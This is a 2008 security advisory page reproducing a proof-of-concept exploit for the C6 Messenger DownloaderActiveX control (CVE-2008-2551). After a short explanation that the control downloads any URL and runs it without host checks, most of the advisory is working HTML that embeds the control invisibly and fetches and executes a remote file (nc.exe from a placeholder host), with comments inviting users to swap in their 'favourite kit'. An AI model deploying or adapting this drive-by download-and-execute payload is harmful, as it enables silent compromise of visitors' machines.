|
 |
| SecurityReason | ||
| WLB | ||
| RSS | ||
| Corporate | ||
| Services | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
| Details : SecurityAlert | ||||
 SecurityAlert : 3926 CVE : CVE-2008-2551 CWE : CWE-264 SecurityRisk : High  (About) Remote Exploit : Yes Local Exploit : No Victim interaction required : Yes Exploit Given : Yes Credit : Nine:Situations:Group Published : 07.06.2008
Advisory Text : <!-- C6 Messenger Installation Url DownloaderActiveX Control Remote Download & Execute Exploit by Nine:Situations:Group::SnoopyAssault site: http://retrogod.altervista.org/ exploit url: http://retrogod.altervista.org/9sg_c6_download_exec.html "C6 Messenger is an instant messaging program produced by Telecom Italia Group, specifically by Alice (distribution), Icon Spa (development, design and server) and Opendoc (graphics). It is the only instant messenger entirely produced in Italy, is a free program, allows you to chat in real time with friends[..]" installation urls: http://c6.community.alice.it/home/index.html http://c6.community.alice.it/download/c6.html Whoever accessed the second one with IE to install c6 IM is vulnerable to this threat. Notice that you can pass also local urls to "propDownloadUrl" property and bypass Internet zone, no host check is performed. "propPostDownloadAction" one is used to launch the executable. A progress bar is shown but you can easily make it not visible. settings: RegKey Safe for Script: False RegKey Safe for Init: False Implements IObjectSafety: True IDisp Safe: Safe for untrusted: caller,data IPersist Safe: Safe for untrusted: caller,data info: http://www.google.com/search?hl=en&q=c1b7e532-3ecb-4e9e-bb3a-2951ffe67c6 1&meta=&num=100&filter=0 Let me guess, this one is already exploited in the wild... Thanks Mommy Telecom Italia!! If you think this poc is useful, please help us to improve our equipment and donate through the paypal button on our site! ------------------------------------------------------------------------ -------- Goodbye rgod-tsid-pah he-ru-ka! --> <HTML> <BODY> <OBJECT ID="DownloaderActiveX1" WIDTH="0" HEIGHT="0" CLASSID="CLSID:c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61" CODEBASE="DownloaderActiveX.cab#Version=1,0,0,1"> <PARAM NAME="propProgressBackground" VALUE="#bccee8"> <PARAM NAME="propTextBackground" VALUE="#f7f8fc"> <PARAM NAME="propBarColor" VALUE="#df0203"> <PARAM NAME="propTextColor" VALUE="#000000"> <PARAM NAME="propWidth" VALUE="0"> <PARAM NAME="propHeight" VALUE="0"> <PARAM NAME="propDownloadUrl" VALUE="http://yoursite.com/nc.exe"><!-- change to your favourite kit ! :) --> <PARAM NAME="propPostDownloadAction" VALUE="run"> <!-- lol --> <PARAM NAME="propInstallCompleteUrl" VALUE=""> <PARAM NAME="propBrowserRedirectUrl" VALUE=""> <PARAM NAME="propVerbose" VALUE="0"> <PARAM NAME="propInterrupt" VALUE="0"> </OBJECT> </BODY> </HTML> References : http://xforce.iss.net/xforce/xfdb/42825 http://www.securityfocus.com/archive/1/archive/1/493019/100/0/threaded http://www.milw0rm.com/exploits/5732 http://www.frsirt.com/english/advisories/2008/1733/references http://secunia.com/advisories/30512 Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
*BSD libc (strfmon) Multiple vulnerabilities
Maksymilian Arciemowicz discovered a Integer Overflow vulnerability in the libc library "strfmon()" function.A vulnerability could allow an attacker who successfully exploits this vulnerability to take control of the affected *BSD systems. |
||
| Apache |  |
|
» Apache Tomcat <= |
||
| PHP | |
|
» PHP 5.2.5 and prior : |
||
- 2008-03-25| Copyright © SecurityReason. All Rights Reserved. |